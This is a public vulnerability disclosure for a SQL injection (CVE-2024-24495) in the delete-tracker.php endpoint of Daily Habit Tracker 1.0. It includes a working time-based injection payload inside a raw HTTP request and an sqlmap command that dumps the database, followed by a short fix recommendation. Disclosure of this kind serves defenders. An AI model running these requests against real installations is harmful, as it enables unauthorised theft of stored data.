# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24495

### SQL Injection:

> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.

### Affected Components:

> delete-tracker.php

### Description:

> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.

## Proof of Concept:

### Manual Exploitation

The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)

### SQLMap

Save the following request to `delete_tracker.txt`:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

Use `sqlmap` with `-r` option to exploit the vulnerability:

```
sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump
```

## Recommendations

When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.